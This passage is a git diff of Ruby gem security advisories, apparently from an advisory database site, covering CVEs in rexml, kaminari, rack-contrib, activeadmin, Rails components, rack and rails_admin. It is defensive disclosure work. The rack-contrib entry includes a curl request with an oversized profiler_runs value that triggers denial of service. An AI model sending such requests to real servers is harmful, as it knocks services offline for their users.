+      and this GHSA made public
+  patched_versions:
+  - ">= 1.16.5"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-r95h-9x8f-r3f7
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5
+    - https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53
+    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/720
+    - https://github.com/advisories/GHSA-r95h-9x8f-r3f7
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-34459
+---
diff --git a/advisories/_posts/2024-05-16-CVE-2024-35176.md b/advisories/_posts/2024-05-16-CVE-2024-35176.md
index 1046ae8f..34f1783d 100644
--- a/advisories/_posts/2024-05-16-CVE-2024-35176.md
+++ b/advisories/_posts/2024-05-16-CVE-2024-35176.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-35176 (rexml): REXML contains a denial of service vulnerability'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-35176
-  ghsa: vg3r-rm7w-2xgh
-  url: https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
-  title: REXML contains a denial of service vulnerability
-  date: 2024-05-16
-  description: |
-    ### Impact
-
-    The REXML gem before 3.2.6 has a DoS vulnerability when it
-    parses an XML that has many `<`s in an attribute value.
-
-    If you need to parse untrusted XMLs, you many be impacted
-    to this vulnerability.
-
-    ### Patches
-
-    The REXML gem 3.2.7 or later include the patch to fix this
-    vulnerability.
-
-    ### Workarounds
-
-    Don't parse untrusted XMLs.
-
-    ### References
-
-    * https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 3.2.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-35176
-    - https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176
-    - https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
-    - https://github.com/ruby/rexml/commit/4325835f92f3f142ebd91a3fdba4e1f1ab7f1cfb
-    - https://github.com/advisories/GHSA-vg3r-rm7w-2xgh
----
+---
+layout: advisory
+title: 'CVE-2024-35176 (rexml): REXML contains a denial of service vulnerability'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-35176
+  ghsa: vg3r-rm7w-2xgh
+  url: https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
+  title: REXML contains a denial of service vulnerability
+  date: 2024-05-16
+  description: |
+    ### Impact
+
+    The REXML gem before 3.2.6 has a DoS vulnerability when it
+    parses an XML that has many `<`s in an attribute value.
+
+    If you need to parse untrusted XMLs, you many be impacted
+    to this vulnerability.
+
+    ### Patches
+
+    The REXML gem 3.2.7 or later include the patch to fix this
+    vulnerability.
+
+    ### Workarounds
+
+    Don't parse untrusted XMLs.
+
+    ### References
+
+    * https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 3.2.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-35176
+    - https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176
+    - https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
+    - https://github.com/ruby/rexml/commit/4325835f92f3f142ebd91a3fdba4e1f1ab7f1cfb
+    - https://github.com/advisories/GHSA-vg3r-rm7w-2xgh
+---
diff --git a/advisories/_posts/2024-05-27-CVE-2024-32978.md b/advisories/_posts/2024-05-27-CVE-2024-32978.md
index e37eaaf0..401f19fb 100644
--- a/advisories/_posts/2024-05-27-CVE-2024-32978.md
+++ b/advisories/_posts/2024-05-27-CVE-2024-32978.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2024-32978 (kaminari): Insecure File Permissions vulnerability in kaminari'
-comments: false
-categories:
-- kaminari
-advisory:
-  gem: kaminari
-  cve: 2024-32978
-  ghsa: 7r3j-qmr4-jfpj
-  url: https://nvd.nist.gov/vuln/detail/CVE-2024-32978
-  title: Insecure File Permissions vulnerability in kaminari
-  date: 2024-05-27
-  description: |
-    kaminari versions prior to 0.16.2 are vulnerable to an Insecure File
-    Permissions vulnerability, where certain files within the kaminari gem have
-    insecure file permissions.
-
-    Versions Affected: < 0.16.2
-    Fixed Versions: >= 0.16.2
-
-    # Impact
-
-    An attacker with local access could write arbitrary code to the affected files
-    resulting in arbitrary code execution.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    Manually set the permissions of the affected files to `644`.
-
-    ## All Affected Versions:
-
-    ```
-    lib/kaminari/models/page_scope_methods.rb
-    ```
-
-    ## Version 0.15.0 and 0.15.1:
-
-    ```
-    spec/models/mongo_mapper/mongo_mapper_spec.rb
-    ```
-
-    ## Version 0.16.0:
-
-    ```
-    spec/models/mongo_mapper/mongo_mapper_spec.rb
-    spec/models/mongoid/mongoid_spec.rb
-    ```
-
-    ## Version 0.16.1:
-
-    ```
-    spec/models/active_record/scopes_spec.rb
-    spec/models/mongo_mapper/mongo_mapper_spec.rb
-    spec/models/mongoid/mongoid_spec.rb
-    gemfiles/data_mapper_12.gemfile
-    gemfiles/active_record_32.gemfile
-    ```
-  cvss_v3: 6.6
-  patched_versions:
-  - ">= 0.16.2"
-  related:
-    url:
-    - https://github.com/kaminari/kaminari/security/advisories/GHSA-7r3j-qmr4-jfpj
----
+---
+layout: advisory
+title: 'CVE-2024-32978 (kaminari): Insecure File Permissions vulnerability in kaminari'
+comments: false
+categories:
+- kaminari
+advisory:
+  gem: kaminari
+  cve: 2024-32978
+  ghsa: 7r3j-qmr4-jfpj
+  url: https://nvd.nist.gov/vuln/detail/CVE-2024-32978
+  title: Insecure File Permissions vulnerability in kaminari
+  date: 2024-05-27
+  description: |
+    kaminari versions prior to 0.16.2 are vulnerable to an Insecure File
+    Permissions vulnerability, where certain files within the kaminari gem have
+    insecure file permissions.
+
+    Versions Affected: < 0.16.2
+    Fixed Versions: >= 0.16.2
+
+    # Impact
+
+    An attacker with local access could write arbitrary code to the affected files
+    resulting in arbitrary code execution.
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    Manually set the permissions of the affected files to `644`.
+
+    ## All Affected Versions:
+
+    ```
+    lib/kaminari/models/page_scope_methods.rb
+    ```
+
+    ## Version 0.15.0 and 0.15.1:
+
+    ```
+    spec/models/mongo_mapper/mongo_mapper_spec.rb
+    ```
+
+    ## Version 0.16.0:
+
+    ```
+    spec/models/mongo_mapper/mongo_mapper_spec.rb
+    spec/models/mongoid/mongoid_spec.rb
+    ```
+
+    ## Version 0.16.1:
+
+    ```
+    spec/models/active_record/scopes_spec.rb
+    spec/models/mongo_mapper/mongo_mapper_spec.rb
+    spec/models/mongoid/mongoid_spec.rb
+    gemfiles/data_mapper_12.gemfile
+    gemfiles/active_record_32.gemfile
+    ```
+  cvss_v3: 6.6
+  patched_versions:
+  - ">= 0.16.2"
+  related:
+    url:
+    - https://github.com/kaminari/kaminari/security/advisories/GHSA-7r3j-qmr4-jfpj
+---
diff --git a/advisories/_posts/2024-05-27-CVE-2024-35231.md b/advisories/_posts/2024-05-27-CVE-2024-35231.md
index 9cd817e6..f350e56b 100644
--- a/advisories/_posts/2024-05-27-CVE-2024-35231.md
+++ b/advisories/_posts/2024-05-27-CVE-2024-35231.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-35231 (rack-contrib): Denial of Service in rack-contrib via "profiler_runs"
-  parameter'
-comments: false
-categories:
-- rack-contrib
-advisory:
-  gem: rack-contrib
-  cve: 2024-35231
-  ghsa: 8c8q-2xw3-j869
-  url: https://nvd.nist.gov/vuln/detail/CVE-2024-35231
-  title: Denial of Service in rack-contrib via "profiler_runs" parameter
-  date: 2024-05-27
-  description: |
-    rack-contrib prior to version 2.5.0 is vulnerable to a Denial of Service
-    via the `profiler_runs` HTTP request parameter.
-
-    Versions Affected: < 2.5.0
-    Fixed Versions: >= 2.5.0
-
-    # Impact
-
-    An attacker can trigger a Denial of Service by sending an HTTP request with
-    an overly large `profiler_runs` parameter.
-
-    ```shell
-    curl  "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"
-    ```
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  cvss_v3: 8.6
-  patched_versions:
-  - ">= 2.5.0"
-  related:
-    url:
-    - https://github.com/rack/rack-contrib/commit/0eec2a9836329051c6742549e65a94a4c24fe6f7
-    - https://github.com/advisories/GHSA-8c8q-2xw3-j869
----
+---
+layout: advisory
+title: 'CVE-2024-35231 (rack-contrib): Denial of Service in rack-contrib via "profiler_runs"
+  parameter'
+comments: false
+categories:
+- rack-contrib
+advisory:
+  gem: rack-contrib
+  cve: 2024-35231
+  ghsa: 8c8q-2xw3-j869
+  url: https://nvd.nist.gov/vuln/detail/CVE-2024-35231
+  title: Denial of Service in rack-contrib via "profiler_runs" parameter
+  date: 2024-05-27
+  description: |
+    rack-contrib prior to version 2.5.0 is vulnerable to a Denial of Service
+    via the `profiler_runs` HTTP request parameter.
+
+    Versions Affected: < 2.5.0
+    Fixed Versions: >= 2.5.0
+
+    # Impact
+
+    An attacker can trigger a Denial of Service by sending an HTTP request with
+    an overly large `profiler_runs` parameter.
+
+    ```shell
+    curl  "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"
+    ```
+
+    # Releases
+
+    The fixed releases are available at the normal locations.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  cvss_v3: 8.6
+  patched_versions:
+  - ">= 2.5.0"
+  related:
+    url:
+    - https://github.com/rack/rack-contrib/commit/0eec2a9836329051c6742549e65a94a4c24fe6f7
+    - https://github.com/advisories/GHSA-8c8q-2xw3-j869
+---
diff --git a/advisories/_posts/2024-06-02-CVE-2024-37031.md b/advisories/_posts/2024-06-02-CVE-2024-37031.md
index 99bedb72..cba1326a 100644
--- a/advisories/_posts/2024-06-02-CVE-2024-37031.md
+++ b/advisories/_posts/2024-06-02-CVE-2024-37031.md
@@ -1,85 +1,85 @@
----
-layout: advisory
-title: 'CVE-2024-37031 (activeadmin): activeadmin vulnerable to stored persistent
-  cross-site scripting (XSS) in dynamic form legends'
-comments: false
-categories:
-- activeadmin
-advisory:
-  gem: activeadmin
-  cve: 2024-37031
-  ghsa: 9mg6-x45v-hcfm
-  url: https://github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
-  title: activeadmin vulnerable to stored persistent cross-site scripting (XSS) in
-    dynamic form legends
-  date: 2024-06-02
-  description: |
-    ### Impact
-
-    Users settings their active admin form legends dynamically may be
-    vulnerable to stored XSS, as long as its value can be injected
-    directly by a malicious user.
-
-    For example:
-
-    * A public web application allows users to create entities with
-      arbitrary names.
-    * Active Admin is used to administrate these entities through a
-      private backend.
-    * The form to edit these entities in the private backend has the
-      following shape (note the dynamic `name` value dependent on an
-      attribute of the `resource`):
-
-    ```ruby
-      form do |f|
-        f.inputs name: resource.name do
-          f.input :name
-          f.input :description
-        end
-
-        f.actions
-      end
-    ```
-
-    Then a malicious user could create an entity with a payload that
-    would get executed in the active admin administrator's browser.
-
-    Both `form` blocks with an implicit or explicit name (i.e., both
-    `form resource.name` or `form name: resource.name` would suffer
-    from the problem), where the value of the name can be arbitrarily
-    set by non admin users.
-
-    ### Patches
-
-    The problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7.
-
-    ### Workarounds
-
-    Users can workaround this problem without upgrading by explicitly
-    escaping the form name using an HTML escaping utility. For example:
-
-    ```ruby
-      form do |f|
-        f.inputs name: ERB::Util.html_escape(resource.name) do
-          f.input :name
-          f.input :description
-        end
-
-        f.actions
-      end
-    ```
-    Upgrading is of course recommended though.
-
-    ### References
-    https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
-  cvss_v3: 7.2
-  patched_versions:
-  - "~> 3.2, >= 3.2.2"
-  - ">= 4.0.0.beta7"
-  related:
-    url:
-    - https://github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
-    - https://github.com/activeadmin/activeadmin/pull/8349
-    - https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
-    - https://github.com/advisories/GHSA-9mg6-x45v-hcfm
----
+---
+layout: advisory
+title: 'CVE-2024-37031 (activeadmin): activeadmin vulnerable to stored persistent
+  cross-site scripting (XSS) in dynamic form legends'
+comments: false
+categories:
+- activeadmin
+advisory:
+  gem: activeadmin
+  cve: 2024-37031
+  ghsa: 9mg6-x45v-hcfm
+  url: https://github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
+  title: activeadmin vulnerable to stored persistent cross-site scripting (XSS) in
+    dynamic form legends
+  date: 2024-06-02
+  description: |
+    ### Impact
+
+    Users settings their active admin form legends dynamically may be
+    vulnerable to stored XSS, as long as its value can be injected
+    directly by a malicious user.
+
+    For example:
+
+    * A public web application allows users to create entities with
+      arbitrary names.
+    * Active Admin is used to administrate these entities through a
+      private backend.
+    * The form to edit these entities in the private backend has the
+      following shape (note the dynamic `name` value dependent on an
+      attribute of the `resource`):
+
+    ```ruby
+      form do |f|
+        f.inputs name: resource.name do
+          f.input :name
+          f.input :description
+        end
+
+        f.actions
+      end
+    ```
+
+    Then a malicious user could create an entity with a payload that
+    would get executed in the active admin administrator's browser.
+
+    Both `form` blocks with an implicit or explicit name (i.e., both
+    `form resource.name` or `form name: resource.name` would suffer
+    from the problem), where the value of the name can be arbitrarily
+    set by non admin users.
+
+    ### Patches
+
+    The problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7.
+
+    ### Workarounds
+
+    Users can workaround this problem without upgrading by explicitly
+    escaping the form name using an HTML escaping utility. For example:
+
+    ```ruby
+      form do |f|
+        f.inputs name: ERB::Util.html_escape(resource.name) do
+          f.input :name
+          f.input :description
+        end
+
+        f.actions
+      end
+    ```
+    Upgrading is of course recommended though.
+
+    ### References
+    https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
+  cvss_v3: 7.2
+  patched_versions:
+  - "~> 3.2, >= 3.2.2"
+  - ">= 4.0.0.beta7"
+  related:
+    url:
+    - https://github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
+    - https://github.com/activeadmin/activeadmin/pull/8349
+    - https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
+    - https://github.com/advisories/GHSA-9mg6-x45v-hcfm
+---
diff --git a/advisories/_posts/2024-06-04-CVE-2024-28103.md b/advisories/_posts/2024-06-04-CVE-2024-28103.md
index a9bd8a58..85fbdee7 100644
--- a/advisories/_posts/2024-06-04-CVE-2024-28103.md
+++ b/advisories/_posts/2024-06-04-CVE-2024-28103.md
@@ -1,77 +1,77 @@
----
-layout: advisory
-title: 'CVE-2024-28103 (actionpack): Missing security headers in Action Pack on non-HTML
-  responses'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-28103
-  ghsa: fwhr-88qx-h9g7
-  url: https://github.com/rails/rails/security/advisories/GHSA-fwhr-88qx-h9g7
-  title: Missing security headers in Action Pack on non-HTML responses
-  date: 2024-06-04
-  description: |
-    Permissions-Policy is Only Served on HTML Content-Type
-
-    The application configurable Permissions-Policy is only served
-    on responses with an HTML related Content-Type.
-
-    This has been assigned the CVE identifier CVE-2024-28103.
-
-    Versions Affected:  >= 6.1.0
-    Not affected:       < 6.1.0
-    Fixed Versions:     6.1.7.8, 7.0.8.4, and 7.1.3.4
-
-    Impact
-    ------
-
-    Responses with a non-HTML Content-Type are not serving the configured
-    Permissions-Policy. There are certain non-HTML Content-Types that
-    would benefit from having the Permissions-Policy enforced.
-
-    Releases
-    --------
-
-    The fixed releases are available at the normal locations.
-
-    Workarounds
-    -----------
-
-    N/A
-
-    Patches
-    -------
-
-    To aid users who aren't able to upgrade immediately we have provided
-    patches for the supported release series in accordance with our
-    [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)
-    regarding security issues. They are in git-am format and consist
-    of a single changeset.
-
-    * 6-1-include-permissions-policy-header-on-non-html.patch - Patch for 6.1 series
-    * 7-0-include-permissions-policy-header-on-non-html.patch - Patch for 7.0 series
-    * 7-1-include-permissions-policy-header-on-non-html.patch - Patch for 7.1 series
-
-    Credits
-    -------
-
-    Thank you [shinkbr](https://hackerone.com/shinkbr) for reporting this!
-  cvss_v3: 5.4
-  unaffected_versions:
-  - "< 6.1.0"
-  patched_versions:
-  - "~> 6.1.7, >= 6.1.7.8"
-  - "~> 7.0.8, >= 7.0.8.4"
-  - "~> 7.1.3, >= 7.1.3.4"
-  - ">= 7.2.0.beta2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28103
-    - https://github.com/rails/rails/security/advisories/GHSA-fwhr-88qx-h9g7
-    - https://github.com/rails/rails/commit/35858f1d9d57f6c4050a8d9ab754bd5d088b4523
-    - https://github.com/advisories/GHSA-fwhr-88qx-h9g7
----
+---
+layout: advisory
+title: 'CVE-2024-28103 (actionpack): Missing security headers in Action Pack on non-HTML
+  responses'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-28103
+  ghsa: fwhr-88qx-h9g7
+  url: https://github.com/rails/rails/security/advisories/GHSA-fwhr-88qx-h9g7
+  title: Missing security headers in Action Pack on non-HTML responses
+  date: 2024-06-04
+  description: |
+    Permissions-Policy is Only Served on HTML Content-Type
+
+    The application configurable Permissions-Policy is only served
+    on responses with an HTML related Content-Type.
+
+    This has been assigned the CVE identifier CVE-2024-28103.
+
+    Versions Affected:  >= 6.1.0
+    Not affected:       < 6.1.0
+    Fixed Versions:     6.1.7.8, 7.0.8.4, and 7.1.3.4
+
+    Impact
+    ------
+
+    Responses with a non-HTML Content-Type are not serving the configured
+    Permissions-Policy. There are certain non-HTML Content-Types that
+    would benefit from having the Permissions-Policy enforced.
+
+    Releases
+    --------
+
+    The fixed releases are available at the normal locations.
+
+    Workarounds
+    -----------
+
+    N/A
+
+    Patches
+    -------
+
+    To aid users who aren't able to upgrade immediately we have provided
+    patches for the supported release series in accordance with our
+    [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)
+    regarding security issues. They are in git-am format and consist
+    of a single changeset.
+
+    * 6-1-include-permissions-policy-header-on-non-html.patch - Patch for 6.1 series
+    * 7-0-include-permissions-policy-header-on-non-html.patch - Patch for 7.0 series
+    * 7-1-include-permissions-policy-header-on-non-html.patch - Patch for 7.1 series
+
+    Credits
+    -------
+
+    Thank you [shinkbr](https://hackerone.com/shinkbr) for reporting this!
+  cvss_v3: 5.4
+  unaffected_versions:
+  - "< 6.1.0"
+  patched_versions:
+  - "~> 6.1.7, >= 6.1.7.8"
+  - "~> 7.0.8, >= 7.0.8.4"
+  - "~> 7.1.3, >= 7.1.3.4"
+  - ">= 7.2.0.beta2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28103
+    - https://github.com/rails/rails/security/advisories/GHSA-fwhr-88qx-h9g7
+    - https://github.com/rails/rails/commit/35858f1d9d57f6c4050a8d9ab754bd5d088b4523
+    - https://github.com/advisories/GHSA-fwhr-88qx-h9g7
+---
diff --git a/advisories/_posts/2024-06-04-CVE-2024-32464.md b/advisories/_posts/2024-06-04-CVE-2024-32464.md
index 25468c7f..7c62b849 100644
--- a/advisories/_posts/2024-06-04-CVE-2024-32464.md
+++ b/advisories/_posts/2024-06-04-CVE-2024-32464.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'CVE-2024-32464 (actiontext): ActionText ContentAttachment can Contain Unsanitized
-  HTML'
-comments: false
-categories:
-- actiontext
-- rails
-advisory:
-  gem: actiontext
-  framework: rails
-  cve: 2024-32464
-  ghsa: prjp-h48f-jgf6
-  url: https://github.com/rails/rails/security/advisories/GHSA-prjp-h48f-jgf6
-  title: ActionText ContentAttachment can Contain Unsanitized HTML
-  date: 2024-06-04
-  description: |
-    Instances of ActionText::Attachable::ContentAttachment included
-    within a rich_text_area tag could potentially contain unsanitized HTML.
-
-    This has been assigned the CVE identifier CVE-2024-32464.
-
-    Versions Affected:  >= 7.1.0
-    Not affected:       < 7.1.0
-    Fixed Versions:     7.1.3.4
-
-    Impact
-    ------
-
-    This could lead to a potential cross site scripting issue within the Trix editor.
-
-    Releases
-    --------
-
-    The fixed releases are available at the normal locations.
-
-    Workarounds
-    -----------
-
-    N/A
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided
-    patches for the supported release series in accordance with our
-    [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)
-    regarding security issues. They are in git-am format and consist
-    of a single changeset.
-
-    * action_text_content_attachment_xss_7_1_stable.patch - Patch for 7.1 series
-
-    Credits
-    -------
-
-    Thank you [ooooooo_q](https://hackerone.com/ooooooo_q) for reporting this!
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 7.1.0"
-  patched_versions:
-  - "~> 7.1.3, >= 7.1.3.4"
-  - ">= 7.2.0.beta2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-32464
-    - https://github.com/rails/rails/security/advisories/GHSA-prjp-h48f-jgf6
-    - https://github.com/rails/rails/commit/e215bf3360e6dfe1497c1503a495e384ed6b0995
-    - https://github.com/advisories/GHSA-prjp-h48f-jgf6
----
+---
+layout: advisory
+title: 'CVE-2024-32464 (actiontext): ActionText ContentAttachment can Contain Unsanitized
+  HTML'
+comments: false
+categories:
+- actiontext
+- rails
+advisory:
+  gem: actiontext
+  framework: rails
+  cve: 2024-32464
+  ghsa: prjp-h48f-jgf6
+  url: https://github.com/rails/rails/security/advisories/GHSA-prjp-h48f-jgf6
+  title: ActionText ContentAttachment can Contain Unsanitized HTML
+  date: 2024-06-04
+  description: |
+    Instances of ActionText::Attachable::ContentAttachment included
+    within a rich_text_area tag could potentially contain unsanitized HTML.
+
+    This has been assigned the CVE identifier CVE-2024-32464.
+
+    Versions Affected:  >= 7.1.0
+    Not affected:       < 7.1.0
+    Fixed Versions:     7.1.3.4
+
+    Impact
+    ------
+
+    This could lead to a potential cross site scripting issue within the Trix editor.
+
+    Releases
+    --------
+
+    The fixed releases are available at the normal locations.
+
+    Workarounds
+    -----------
+
+    N/A
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided
+    patches for the supported release series in accordance with our
+    [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues)
+    regarding security issues. They are in git-am format and consist
+    of a single changeset.
+
+    * action_text_content_attachment_xss_7_1_stable.patch - Patch for 7.1 series
+
+    Credits
+    -------
+
+    Thank you [ooooooo_q](https://hackerone.com/ooooooo_q) for reporting this!
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 7.1.0"
+  patched_versions:
+  - "~> 7.1.3, >= 7.1.3.4"
+  - ">= 7.2.0.beta2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32464
+    - https://github.com/rails/rails/security/advisories/GHSA-prjp-h48f-jgf6
+    - https://github.com/rails/rails/commit/e215bf3360e6dfe1497c1503a495e384ed6b0995
+    - https://github.com/advisories/GHSA-prjp-h48f-jgf6
+---
diff --git a/advisories/_posts/2024-07-03-CVE-2024-39316.md b/advisories/_posts/2024-07-03-CVE-2024-39316.md
index 7b69ccbb..ecdef1b0 100644
--- a/advisories/_posts/2024-07-03-CVE-2024-39316.md
+++ b/advisories/_posts/2024-07-03-CVE-2024-39316.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2024-39316 (rack): Rack ReDoS Vulnerability in HTTP Accept Headers Parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2024-39316
-  ghsa: cj83-2ww7-mvq7
-  url: https://github.com/rack/rack/security/advisories/GHSA-cj83-2ww7-mvq7
-  title: Rack ReDoS Vulnerability in HTTP Accept Headers Parsing
-  date: 2024-07-03
-  description: |
-    ### Summary
-
-    A Regular Expression Denial of Service (ReDoS) vulnerability exists
-    in the `Rack::Request::Helpers` module when parsing HTTP Accept headers.
-    This vulnerability can be exploited by an attacker sending specially
-    crafted `Accept-Encoding` or `Accept-Language` headers, causing the
-    server to spend excessive time processing the request and leading
-    to a Denial of Service (DoS).
-
-    ### Details
-
-    The fix for https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f
-    was not applied to the main branch and thus while the issue was fixed
-    for the Rack v3.0 release series, it was not fixed in the v3.1
-    release series until v3.1.5.
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 3.1.0"
-  patched_versions:
-  - ">= 3.1.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-39316
-    - https://github.com/rack/rack/security/advisories/GHSA-cj83-2ww7-mvq7
-    - https://github.com/rack/rack/commit/412c980450ca729ee37f90a2661f166a9665e058
-    - https://github.com/advisories/GHSA-cj83-2ww7-mvq7
----
+---
+layout: advisory
+title: 'CVE-2024-39316 (rack): Rack ReDoS Vulnerability in HTTP Accept Headers Parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2024-39316
+  ghsa: cj83-2ww7-mvq7
+  url: https://github.com/rack/rack/security/advisories/GHSA-cj83-2ww7-mvq7
+  title: Rack ReDoS Vulnerability in HTTP Accept Headers Parsing
+  date: 2024-07-03
+  description: |
+    ### Summary
+
+    A Regular Expression Denial of Service (ReDoS) vulnerability exists
+    in the `Rack::Request::Helpers` module when parsing HTTP Accept headers.
+    This vulnerability can be exploited by an attacker sending specially
+    crafted `Accept-Encoding` or `Accept-Language` headers, causing the
+    server to spend excessive time processing the request and leading
+    to a Denial of Service (DoS).
+
+    ### Details
+
+    The fix for https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f
+    was not applied to the main branch and thus while the issue was fixed
+    for the Rack v3.0 release series, it was not fixed in the v3.1
+    release series until v3.1.5.
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 3.1.0"
+  patched_versions:
+  - ">= 3.1.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-39316
+    - https://github.com/rack/rack/security/advisories/GHSA-cj83-2ww7-mvq7
+    - https://github.com/rack/rack/commit/412c980450ca729ee37f90a2661f166a9665e058
+    - https://github.com/advisories/GHSA-cj83-2ww7-mvq7
+---
diff --git a/advisories/_posts/2024-07-08-CVE-2024-39308.md b/advisories/_posts/2024-07-08-CVE-2024-39308.md
index 94569b91..21e9086f 100644
--- a/advisories/_posts/2024-07-08-CVE-2024-39308.md
+++ b/advisories/_posts/2024-07-08-CVE-2024-39308.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2024-39308 (rails_admin): RailsAdmin Cross-site Scripting vulnerability
-  in the list view'
-comments: false
-categories:
-- rails_admin
-advisory:
-  gem: rails_admin
-  cve: 2024-39308
-  ghsa: 8qgm-g2vv-vwvc
-  url: https://github.com/railsadminteam/rails_admin/security/advisories/GHSA-8qgm-g2vv-vwvc
-  title: RailsAdmin Cross-site Scripting vulnerability in the list view
-  date: 2024-07-08
-  description: |
-    ### Impact
-    RailsAdmin list view has the XSS vulnerability, caused by
-    improperly-escaped HTML title attribute. The issue was originally
-    reported in https://github.com/railsadminteam/rails_admin/issues/3686.
-
-    ### Patches
-    Upgrade to [3.1.3](https://rubygems.org/gems/rails_admin/versions/3.1.3)
-    or [2.3.0](https://rubygems.org/gems/rails_admin/versions/2.3.0).
-
-    ### Workarounds
-    1. Copy the index view (located under the path
-       `app/views/rails_admin/main/index.html.erb`) from the RailsAdmin
-       version you use, and place it into your application by using
-       the same path.
-
-    2. Open the view file by an editor, and remove `strip_tags` from
-       the title attribute (as shown in GHSA advisory below).
-
-    **Note:** The view file created by this needs to be removed after
-    upgrading RailsAdmin afterwards, unless this old view continue to
-    be used. Only do this if you can't upgrade RailsAdmin now for a reason.
-
-    ### References
-    https://owasp.org/www-community/attacks/xss/
-    https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-strip_tags
-  cvss_v3: 6.8
-  patched_versions:
-  - "~> 2.3.0"
-  - ">= 3.1.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-39308
-    - https://github.com/railsadminteam/rails_admin/security/advisories/GHSA-8qgm-g2vv-vwvc
-    - https://github.com/railsadminteam/rails_admin/issues/3686
-    - https://github.com/railsadminteam/rails_admin/commit/b5a287d82e2cbd1737a1a01e11ede2911cce7fef
-    - https://github.com/railsadminteam/rails_admin/commit/d84b39884059c4ed50197cec8522cca029a17673
-    - https://rubygems.org/gems/rails_admin/versions/2.3.0
-    - https://rubygems.org/gems/rails_admin/versions/3.1.3
-    - https://github.com/advisories/GHSA-8qgm-g2vv-vwvc
----
+---
+layout: advisory
+title: 'CVE-2024-39308 (rails_admin): RailsAdmin Cross-site Scripting vulnerability
+  in the list view'
+comments: false
+categories:
+- rails_admin
+advisory:
+  gem: rails_admin
+  cve: 2024-39308
+  ghsa: 8qgm-g2vv-vwvc
+  url: https://github.com/railsadminteam/rails_admin/security/advisories/GHSA-8qgm-g2vv-vwvc
+  title: RailsAdmin Cross-site Scripting vulnerability in the list view
+  date: 2024-07-08
+  description: |
+    ### Impact
+    RailsAdmin list view has the XSS vulnerability, caused by
+    improperly-escaped HTML title attribute. The issue was originally
+    reported in https://github.com/railsadminteam/rails_admin/issues/3686.
+
+    ### Patches
+    Upgrade to [3.1.3](https://rubygems.org/gems/rails_admin/versions/3.1.3)
